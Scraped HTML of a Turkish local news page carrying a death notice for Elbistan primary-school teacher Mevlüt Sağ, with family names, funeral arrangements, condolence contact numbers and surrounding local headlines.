src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/fuzulev_gif_980.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/koronavirus-ilkokul-ogretmenini-hayattan-kopardi-h68089.html" title="Koronavirüs, ilkokul öğretmenini hayattan kopardı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/10/121806648_2895923960691340_1407062774676654787_n.jpg" alt="Koronavirüs, ilkokul öğretmenini hayattan kopardı" class="pull-left" /> <div class="caption-line"><p>Koronavirüs, ilkokul öğretmenini hayattan kopardı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-salgindan-kurtulmanin-yontemi-maske-mesafe-ve-hijyen-h68088.html" title="Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/10/Ysimsiz-1_18.jpg" alt="Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”" class="pull-left" /> <div class="caption-line"><p>Kaymakam Demir: “Salgından kurtulmanın yöntemi...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/tarsim-kuraklik-sigortasi-odemelerine-basladi-h68087.html" title="TARSİM, kuraklık sigortası ödemelerine başladı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/10/tarsim.jpg" alt="TARSİM, kuraklık sigortası ödemelerine başladı" class="pull-left" /> <div class="caption-line"><p>TARSİM, kuraklık sigortası ödemelerine başladı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/7-mahalleyi-ilceye-baglayan-yol-asfaltlaniyor-h68085.html" title="7 mahalleyi ilçeye bağlayan yol asfaltlanıyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/10/Ysimsiz-1_17.jpg" alt="7 mahalleyi ilçeye bağlayan yol asfaltlanıyor" class="pull-left" /> <div class="caption-line"><p>7 mahalleyi ilçeye bağlayan yol...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/9-gundur-kayipti-ormanlik-alanda-cansiz-bedeni-bulundu-h68081.html" title="9 gündür kayıptı, ormanlık alanda cansız bedeni bulundu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/10/Ysimsiz-1_16.jpg" alt="9 gündür kayıptı, ormanlık alanda cansız bedeni bulundu" class="pull-left" /> <div class="caption-line"><p>9 gündür kayıptı, ormanlık alanda...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Mevlüt Sağ 46 yaşında</h1> <h2 class="lead" itemprop="description"><strong></strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-10-17 06:20:49" content="2020-10-17T06:20:49+02:00">17 Ekim 2020 Cumartesi 06:20</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/mevlut_sag_46_yasinda_h68090_ef5c0.jpg" alt="Mevlüt Sağ 46 yaşında" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/mevlut-sag-46-yasinda-h68090.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistaninsesi.com/banner.php?id=17" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/gocbal1_2.gif" width="336" height="280" style="width:336px;height: 280px;border:0" alt="banner17" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Merhum Ferhat ve Hatice Sağ ailesinin oğlu çarşı esnaflarından Atilla Sağ’ın ve Sosyal Yardımlaşma Vakfı Müdürü Dilek Otlutepe’nin kardeşi, hastane personeli Mehtap Sağ’ın eşi, Erdem, Furkan ve Batuhan kardeşlerin babası, EÜAŞ personellerinden Tahir Sevin’in yeğeni, İğde Mahallesinden Hasan Marangoz’un damadı, Ali, Mehmet, Süleyman Marangoz, Serap Ayat, Müslime Saykın kardeşlerin eniştesi, Halil Ayat ve Abdulkadir Saykın bacanakların bacanağı, BİLSEM öğretmenlerinden Cuma Otlutepe’nin kayınbiraderi TOKİ Şehit Er Levent Kuşoğlu İlkokulu öğretmenlerinden Mevlüt Sağ vefat etmiştir. Cenazesi 17 Ekim Cumartesi günü öğle namazına müteakiben Gariplik Camiinde kılınıp Gariplik Mezarlığına defnedilecektir. Kur’an-ı Kerim’i, Pınarbaşı Mahallesi Bahçeşehir Konutları kendi hanesinde okunacaktır.</span></span><span style="font-family: Arial, sans-serif; font-size: 16px;"> </span><br/> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Taziye için telefonlar:</span></span><br/> <span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">0546 468 5501 ağabeyi Atilla Sağ<br/> </span></span><span style="font-family: Arial, sans-serif; font-size: 16px;">0541 412 5292 kayınbiraderi Cuma Otlutepe</span></p> <p class="MsoNormal"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;"><p> </p></span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/koronavirus-ilkokul-ogretmenini-hayattan-kopardi-h68089.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-salgindan-kurtulmanin-yontemi-maske-mesafe-ve-hijyen-h68088.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tarsim-kuraklik-sigortasi-odemelerine-basladi-h68087.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hemde-okuma-yazma-kursu-acildi-h68086.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/7-mahalleyi-ilceye-baglayan-yol-asfaltlaniyor-h68085.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/debgici-aday-olmayacagini-acikladi-h68084.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/9-gundur-kayipti-ormanlik-alanda-cansiz-bedeni-bulundu-h68081.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/uyusturucu-saticisi-abla-kardes-tutuklandi-h68080.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/minibusun-carptigi-yasli-adam-hayatini-kaybetti-h68078.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-yuz-yuze-egitime-baslayan-ogrencileri-ziyaret-etti-h68077.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hemde-yeni-egitim-ogretim-yili-kurs-programlari-belli-oldu-h68072.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/muhtar-cinayetinin-sanigina-18-yil-hapis-h68076.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kactigi-yurda-geri-gonderildi-h68075.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/emniyet-ve-jandarmanin-hizmet-binasi-ihtiyaci-bakan-soyluya-iletildi-h68074.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/afsinli-besicinin-traktorle-ankara-yolculugu-yarim-kaldi-h68073.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-i-seracilik-ussune-donusturecek-ilk-adim-atildi-h68061.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-yanan-ormanlara-2023-adet-fidanla-can-katacak-h68062.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nurhakta-2-bin-yillik-tumulusler-sit-alani-ilan-edildi-h68067.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-komur-denetimi-h68063.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gokboru-hukuk-ve-danismanlik-ofisi-acildi-h68065.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/etsodan-baskan-tirasa-hayirli-olsun-ziyareti-h68064.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/yarali-kopege-sefkat-elini-uzattilar-h68060.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mhp-elbistan-da-unutulmaya-yuz-tutan-siftah-gelenegini-yasatti-h68059.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanli-ogretmen-gogsumuzu-kabartti-h68054.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/koronavirus-ilkokul-ogretmenini-hayattan-kopardi-h68089.html" title="Koronavirüs, ilkokul öğretmenini hayattan kopardı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/koronavirus_ilkokul_ogretmenini_hayattan_kopardi_h68089_2b6f7.jpg" alt="Koronavirüs, ilkokul öğretmenini hayattan kopardı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Koronavirüs, ilkokul öğretmenini hayattan kopardı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-salgindan-kurtulmanin-yontemi-maske-mesafe-ve-hijyen-h68088.html" title="Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/kaymakam_demir_salgindan_kurtulmanin_yontemi_maske_mesafe_ve_hijyen_h68088_90529.jpg" alt="Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tarsim-kuraklik-sigortasi-odemelerine-basladi-h68087.html" title="TARSİM, kuraklık sigortası ödemelerine başladı"> <span class="label label-important"><i class="halflings-icon white exclamation-sign"></i> Son Dakika</span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/tarsim_kuraklik_sigortasi_odemelerine_basladi_h68087_be2bf.jpg" alt="TARSİM, kuraklık sigortası ödemelerine başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">TARSİM, kuraklık sigortası ödemelerine başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hemde-okuma-yazma-kursu-acildi-h68086.html" title="HEM’de okuma yazma kursu açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/hemde_okuma_yazma_kursu_acildi_h68086_a4748.jpg" alt="HEM’de okuma yazma kursu açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">HEM’de okuma yazma kursu açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/7-mahalleyi-ilceye-baglayan-yol-asfaltlaniyor-h68085.html" title="7 mahalleyi ilçeye bağlayan yol asfaltlanıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/7_mahalleyi_ilceye_baglayan_yol_asfaltlaniyor_h68085_d9c5b.jpg" alt="7 mahalleyi ilçeye bağlayan yol asfaltlanıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">7 mahalleyi ilçeye bağlayan yol asfaltlanıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/debgici-aday-olmayacagini-acikladi-h68084.html" title="Debgici, aday olmayacağını açıkladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/debgici_aday_olmayacagini_acikladi_h68084_98cee.jpg" alt="Debgici, aday olmayacağını açıkladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Debgici, aday olmayacağını açıkladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/9-gundur-kayipti-ormanlik-alanda-cansiz-bedeni-bulundu-h68081.html" title="9 gündür kayıptı, ormanlık alanda cansız bedeni bulundu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/9_gundur_kayipti_ormanlik_alanda_cansiz_bedeni_bulundu_h68081_80103.jpg" alt="9 gündür kayıptı, ormanlık alanda cansız bedeni bulundu" /> <div class="carousel-caption"> <h2> <span style="font-size:">9 gündür kayıptı, ormanlık alanda cansız bedeni bulundu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-saticisi-abla-kardes-tutuklandi-h68080.html" title="Uyuşturucu satıcısı abla-kardeş tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/uyusturucu_saticisi_abla_kardes_tutuklandi_h68080_793a0.jpg" alt="Uyuşturucu satıcısı abla-kardeş tutuklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Uyuşturucu satıcısı abla-kardeş tutuklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html" title="Elbistan’da tarihe ışık tutan Kız Kalesi, turizme kazandırılacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/elbistanda_tarihe_isik_tutan_kiz_kalesi_turizme_kazandirilacak_h68079_2fd3f.jpg" alt="Elbistan’da tarihe ışık tutan Kız Kalesi, turizme kazandırılacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da tarihe ışık tutan Kız Kalesi, turizme kazandırılacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/minibusun-carptigi-yasli-adam-hayatini-kaybetti-h68078.html" title="Minibüsün çarptığı yaşlı adam hayatını kaybetti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/minibusun_carptigi_yasli_adam_hayatini_kaybetti_h68078_91a6d.jpg" alt="Minibüsün çarptığı yaşlı adam hayatını kaybetti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Minibüsün çarptığı yaşlı adam hayatını kaybetti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-yuz-yuze-egitime-baslayan-ogrencileri-ziyaret-etti-h68077.html" title="Kaymakam Demir, yüz yüze eğitime başlayan öğrencileri ziyaret etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/kaymakam_demir_yuz_yuze_egitime_baslayan_ogrencileri_ziyaret_etti_h68077_4e7c1.jpg" alt="Kaymakam Demir, yüz yüze eğitime başlayan öğrencileri ziyaret etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir, yüz yüze eğitime başlayan öğrencileri ziyaret etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hemde-yeni-egitim-ogretim-yili-kurs-programlari-belli-oldu-h68072.html" title="HEM’de yeni eğitim öğretim yılı kurs programları belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/hemde_yeni_egitim_ogretim_yili_kurs_programlari_belli_oldu_h68072_17032.jpg" alt="HEM’de yeni eğitim öğretim yılı kurs programları belli oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">HEM’de yeni eğitim öğretim yılı kurs programları belli oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/muhtar-cinayetinin-sanigina-18-yil-hapis-h68076.html" title="Muhtar cinayetinin sanığına 18 yıl hapis"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/muhtar_cinayetinin_sanigina_18_yil_hapis_h68076_bfd3e.jpg" alt="Muhtar cinayetinin sanığına 18 yıl hapis" /> <div class="carousel-caption"> <h2> <span style="font-size:">Muhtar cinayetinin sanığına 18 yıl hapis</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kactigi-yurda-geri-gonderildi-h68075.html" title="Kaçtığı yurda geri gönderildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/kactigi_yurda_geri_gonderildi_h68075_54441.jpg" alt="Kaçtığı yurda geri gönderildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaçtığı yurda geri gönderildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/emniyet-ve-jandarmanin-hizmet-binasi-ihtiyaci-bakan-soyluya-iletildi-h68074.html" title="Emniyet ve Jandarmanın hizmet binası ihtiyacı Bakan Soylu’ya iletildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/emniyet_ve_jandarmanin_hizmet_binasi_ihtiyaci_bakan_soyluya_iletildi_h68074_715b1.jpg" alt="Emniyet ve Jandarmanın hizmet binası ihtiyacı Bakan Soylu’ya iletildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Emniyet ve Jandarmanın hizmet binası ihtiyacı Bakan Soylu’ya iletildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/afsinli-besicinin-traktorle-ankara-yolculugu-yarim-kaldi-h68073.html" title="Afşinli besicinin traktörle Ankara yolculuğu yarım kaldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/afsinli_besicinin_traktorle_ankara_yolculugu_yarim_kaldi_h68073_dee65.jpg" alt="Afşinli besicinin traktörle Ankara yolculuğu yarım kaldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Afşinli besicinin traktörle Ankara yolculuğu yarım kaldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-i-seracilik-ussune-donusturecek-ilk-adim-atildi-h68061.html" title="Elbistan&#039;ı seracılık üssüne dönüştürecek ilk adım atıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/elbistan_i_seracilik_ussune_donusturecek_ilk_adim_atildi_h68061_18882.jpg" alt="Elbistan&#039;ı seracılık üssüne dönüştürecek ilk adım atıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan&#039;ı seracılık üssüne dönüştürecek ilk adım atıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-yanan-ormanlara-2023-adet-fidanla-can-katacak-h68062.html" title="Elbistan Belediyesi yanan ormanlara 2023 adet fidanla can katacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/elbistan_belediyesi_yanan_ormanlara_2023_adet_fidanla_can_katacak_h68062_39cf3.jpg" alt="Elbistan Belediyesi yanan ormanlara 2023 adet fidanla can katacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi yanan ormanlara 2023 adet fidanla can katacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nurhakta-2-bin-yillik-tumulusler-sit-alani-ilan-edildi-h68067.html" title="Nurhak’ta 2 bin yıllık Tümülüsler sit alanı ilan edildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/nurhakta_2_bin_yillik_tumulusler_sit_alani_ilan_edildi_h68067_b5c12.jpg" alt="Nurhak’ta 2 bin yıllık Tümülüsler sit alanı ilan edildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nurhak’ta 2 bin yıllık Tümülüsler sit alanı ilan edildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-komur-denetimi-h68063.html" title="Elbistan Belediyesi’nden kömür denetimi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/elbistan_belediyesinden_komur_denetimi_h68063_0b068.jpg" alt="Elbistan Belediyesi’nden kömür denetimi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi’nden kömür denetimi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gokboru-hukuk-ve-danismanlik-ofisi-acildi-h68065.html" title="Gökbörü Hukuk ve Danışmanlık Ofisi açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/gokboru_hukuk_ve_danismanlik_ofisi_acildi_h68065_cc061.jpg" alt="Gökbörü Hukuk ve Danışmanlık Ofisi açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gökbörü Hukuk ve Danışmanlık Ofisi açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/etsodan-baskan-tirasa-hayirli-olsun-ziyareti-h68064.html" title="ETSO’dan Başkan Tıraş’a hayırlı olsun ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/etsodan_baskan_tirasa_hayirli_olsun_ziyareti_h68064_93bce.jpg" alt="ETSO’dan Başkan Tıraş’a hayırlı olsun ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">ETSO’dan Başkan Tıraş’a hayırlı olsun ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/yarali-kopege-sefkat-elini-uzattilar-h68060.html" title="Yaralı köpeğe şefkat elini uzattılar"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/yarali_kopege_sefkat_elini_uzattilar_h68060_4696a.jpg" alt="Yaralı köpeğe şefkat elini uzattılar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Yaralı köpeğe şefkat elini uzattılar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/mhp-elbistan-da-unutulmaya-yuz-tutan-siftah-gelenegini-yasatti-h68059.html" title="MHP, Elbistan&#039;da unutulmaya yüz tutan &#039;siftah&#039; geleneğini yaşattı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/mhp_elbistan_da_unutulmaya_yuz_tutan_siftah_gelenegini_yasatti_h68059_42b55.jpg" alt="MHP, Elbistan&#039;da unutulmaya yüz tutan &#039;siftah&#039; geleneğini yaşattı" /> <div class="carousel-caption"> <h2> <span style="font-size:">MHP, Elbistan&#039;da unutulmaya yüz tutan &#039;siftah&#039; geleneğini yaşattı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-ogretmen-gogsumuzu-kabartti-h68054.html" title="Elbistanlı öğretmen göğsümüzü kabarttı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/10/elbistanli_ogretmen_gogsumuzu_kabartti_h68054_ebc2e.jpg" alt="Elbistanlı öğretmen göğsümüzü kabarttı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanlı öğretmen göğsümüzü kabarttı</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Mevl%C3%BCt+Sa%C4%9F+46+ya%C5%9F%C4%B1nda" title="Mevlüt Sağ 46 Yaşında haberleri">Mevlüt Sağ 46 Yaşında</a></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/mevlut-sag-46-yasinda-h68090.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(68090);return false;" class="btn btn-warning 